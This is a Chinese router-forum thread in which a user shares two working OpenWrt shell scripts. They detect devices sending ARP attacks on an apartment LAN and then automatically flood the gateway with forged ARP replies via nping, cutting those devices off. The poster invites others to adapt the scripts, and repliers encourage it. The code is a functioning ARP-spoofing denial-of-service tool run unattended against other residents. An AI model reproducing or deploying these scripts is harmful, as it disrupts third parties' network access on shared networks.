openwrt反攻局域网arp攻击shell脚本

null666666

shell脚本，局域网arp攻击狗实在蛋疼，arptables防火墙只能防止向下欺骗，没法保证这些人攻击网关，所以我给旧路由(极路由1s) 刷了openwrt，用screen 运行了自己写的反攻脚本！
无人值守，自动攻击，对方几分钟断网一次，对于打游戏的那帮人，估计快疯了，横行嚣张局域网1年了，这会儿丫估计快尿了！不建议不懂shell的用，要安装好些软件，ip-full,arptables,nping....
我把代码放上来，懂得拿去改改用，懒得注释！

1.主脚本，用于收集arp攻击设备ip，去重，然后调用子脚本多线程攻击

1. #!/bin/sh
   
2. 
   
3. mac_spc() {
   
4.     local i=$(awk 'BEGIN{srand();printf int((2355*rand())+1)}')
   
5.     local f=$(cat macf6e.txt | sed -n "${i}p")
   
6.     local s=$(echo '0123456789ABCDEF' | awk '{srand(); for (i = 1; i <= 6; i++){printf substr($0,int((16*rand())+1),1)}}')
   
7.     local l=":${s:0:2}:${s:2:2}:"
   
8.     echo $f$l
   
9. }
   
10. rnd_num() {
    
11.     echo $(awk 'BEGIN{srand();printf int((4*rand())+1)}')
    
12.     return 0
    
13. }
    
14. 
    
15. wd=$(ifconfig wlan0 | grep 'inet addr:' | awk -F '[: ]+' '{print $4}' | awk 'BEGIN{FS=".";OFS="."}{print $1,$2,$3}')
    
16. gw_ip="${wd}.1"
    
17. gw_mac=$(cat /proc/net/arp | grep -w "${gw_ip}" | awk '{print $4}')
    
18. ipx=$(ifconfig wlan0 | grep 'inet addr:' | awk -F '[: ]+' '{print $4}')
    
19. js=0
    
20. res=""
    
21. lst=""
    
22. chs=5
    
23. while getopts ':i' OPT; do
    
24.     case $OPT in
    
25.     i) $OPTARG + 10 &>/dev/null && chs=$OPTARG ;;
    
26.     esac
    
27. done
    
28. 
    
29. while true; do
    
30.     arping -DI wlan0 ${gw_ip} &>/dev/null
    
31.     sleep 1s
    
32.     >attc220806_file
    
33.     {
    
34.         tcpdump -qnei wlan0 arp net ${wd} and not host ${gw_ip} and dst host ${ipx} -l | awk -F '[, ]+' '{print $9}' >>attc220806_file
    
35.     } &>/dev/null &
    
36.     sleep 60s
    
37.     killall 'tcpdump'
    
38.     >attc220806_res
    
39.     sort -u attc220806_file | grep -v "^$" >attc220806_res
    
40.     if [ -s './attc220806_res' ]; then
    
41.         let js++
    
42.         fmacc=$(mac_spc)
    
43.         j=10
    
44.         if [ $js -gt $chs ]; then
    
45.             js=0
    
46.             cat /root/attc220806_alst /root/attc220806_res | sort -n | uniq -u >/root/attc220806_grd
    
47.             lst="/root/attc220806_grd"
    
48.         else
    
49.             lst="/root/attc220806_res"
    
50.         fi
    
51.         while read i; do
    
52.             let j++
    
53.             macc="${fmacc}$j"
    
54.             {
    
55.                 ./ntt2.sh 6 100 "${gw_ip}" "${gw_mac}" "${i}" "${macc}"
    
56.             } &>/dev/null &
    
57.         done <${lst}
    
58.         wait
    
59.         res="table: ${lst}, $(date +%Y'-'%m'-'%d' '%H':'%M':'%S)"
    
60.         echo -e "${res}" | tee -a /root/libfl/attc220806log
    
61.         cat ${lst} >>/root/libfl/attc220806log
    
62.     else
    
63.         echo -e "attc220806_res empty!...  $(date +%Y'-'%m'-'%d' '%H':'%M':'%S)" | tee -a /root/libfl/attc220806log
    
64.     fi
    
65.     sleep $(rnd_num)m
    
66. done

复制代码

2.子脚本ntt2.sh，用于调用nping 刷网关缓存，把对方的ip刷到一个不存在的mac，让对方无法上网

1. #!/bin/sh
   
2. 
   
3. mac_rnd() {
   
4.     local i=$(awk 'BEGIN{srand();printf int((2355*rand())+1)}')
   
5.     local f=$(cat /root/macf6e.txt | sed -n "${i}p")
   
6.     local s=$(echo '0123456789ABCDEF' | awk '{srand(); for (i = 1; i <= 6; i++){printf substr($0,int((16*rand())+1),1)}}')
   
7.     local l=":${s:0:2}:${s:2:2}:${s:4:2}"
   
8.     echo $f$l
   
9.     return 0
   
10. }
    
11. 
    
12. ctt=$1
    
13. ktt=$2
    
14. gtw_ip=$3
    
15. gtw_mac=$4
    
16. fwip=$5
    
17. fmac=$6
    
18. 
    
19. # echo "nping --arp --arp-type arp-reply --arp-target-mac $gtw_mac --arp-target-ip $gtw_ip --arp-sender-ip $fwip --arp-sender-mac $fmac -c 1 $gtw_ip"
    
20. 
    
21. tmp_fifo="./$$.fifo"
    
22. mkfifo "${tmp_fifo}"
    
23. exec 6<>"${tmp_fifo}"
    
24. rm -rf "${tmp_fifo}"
    
25. 
    
26. for i in $(seq 1 $ctt); do
    
27.     echo
    
28. done >&6
    
29. 
    
30. for j in $(seq 1 $ktt); do
    
31.     read -u6
    
32.     {
    
33.         nping --arp --arp-type arp-reply --arp-target-mac $gtw_mac --arp-target-ip $gtw_ip --arp-sender-ip $fwip --arp-sender-mac $fmac -c 1 $gtw_ip
    
34.         echo >&6
    
35.     } &>/dev/null &
    
36. done
    
37. wait
    
38. exec 6<&-
    
39. exec 6>&-
    
40. exit 0

复制代码

3.效果大概如下图，用另一台openwrt 路由tcpdump 抓的arp包

请不要胡乱输入以及粘贴、复制等方式灌水

请尊重作者、并共同维护网站的正常阅读，否则账户将会被限制发帖、回帖，站内短信以及阅读权限等都会受到影响，谢谢。 具体限制方式：https://www.right.com.cn/forum/thread-8307840-1-1.html

wulishui

不错，给他点狠的

null666666

wulishui 发表于 2022-8-7 20:19
不错，给他点狠的

嘿嘿，谢谢

moqingzhu

那么你是来炫耀的还是来分享干货的？

moqingzhu

发错了，在恩山APP里面不显示代码，还以为你没发代码

null666666

moqingzhu 发表于 2022-8-7 20:58
那么你是来炫耀的还是来分享干货的？

没有，没有，抛砖引玉，恩山大神如麻，我岂敢造次板门弄斧！只是让人攻击的实在没辙了，自己研究了半天，一点小成果，记录一下

wulishui

我的做法是，发现某MAC有两个IP的话，就禁他。不过有一定错杀。

null666666

wulishui 发表于 2022-8-7 21:08
我的做法是，发现某MAC有两个IP的话，就禁他。不过有一定错杀。

你是在路由器里面看的吗，还是用 arping -D检测的，还是其他啥方法，我住个公寓，人乱的很，估计有懂网络的，不知道用的啥技术？我也弄不明白，一般比较卡的时候，用arping -D 检测网关，倒是只有网关回复，但是同时用tcpdump 抓arp包，会有好几台设备疯狂的询问我的mac 地址，然后把这些机器反攻了，就不卡了，搞不明白具体啥状况？

名字很难取

wulishui

null666666 发表于 2022-8-7 21:48
你是在路由器里面看的吗，还是用 arping -D检测的，还是其他啥方法，我住个公寓，人乱的很，估计有懂网络 ...

我是在路由上搞，原来你是在客户端搞

null666666

wulishui 发表于 2022-8-7 22:10
我是在路由上搞，原来你是在客户端搞

我也是在路由呀，只不过路由器差不多 当成一个网卡用了，一个光猫既拨号又路由，然后接一个交换机，交换机接一些二级路由 提供wifi热点，然后我的路由 用无线中继在 这些二级路由上，或者是 光猫默认开的那个wifi上，然后交换机里面 N多arp攻击，我就是  干这些arp攻击

MonikaChen

用于图书馆？

null666666

MonikaChen 发表于 2022-8-8 12:40
用于图书馆？

不是，别乱用，我是用来对付 公寓局域网的arp攻击的人，毕竟反攻的思路也是arp攻击，用多线程更高强度的攻击而已

synoman

大佬，这些代码是一个一个敲出来的吗？
有没有比较好的思考的网站

null666666

synoman 发表于 2022-8-9 15:18
大佬，这些代码是一个一个敲出来的吗？
有没有比较好的思考的网站

别，别，我是菜鸡，b站有 某黑马的shell 视频教程，我是跟那个学的，但是shell 有很多种，有一些小差异，比如openwrt 里面这个 连数组都不支持，还得边学边摸索